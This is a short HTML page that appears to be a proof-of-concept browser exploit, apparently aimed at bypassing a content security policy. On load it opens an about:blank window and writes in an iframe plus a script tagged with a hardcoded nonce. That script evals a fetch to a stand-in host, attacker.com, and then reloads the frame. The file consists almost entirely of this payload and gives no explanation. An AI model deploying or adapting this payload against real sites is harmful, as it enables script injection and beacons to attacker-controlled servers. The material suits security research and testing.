<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<script>
window.onload = function() {
    w=window.open("about:blank"); w.document.write("<iframe id=GGGSbWaEGGG src=about:blank><\/iframe><script nonce=123>GGGSbWaEGGG.onload=_=>GGGSbWaEGGG.contentWindow.eval('fetch(`https://attacker.com/report/report`)');GGGSbWaEGGG.contentWindow.location.reload();<\/script>");
};
</script>
</body>
</html>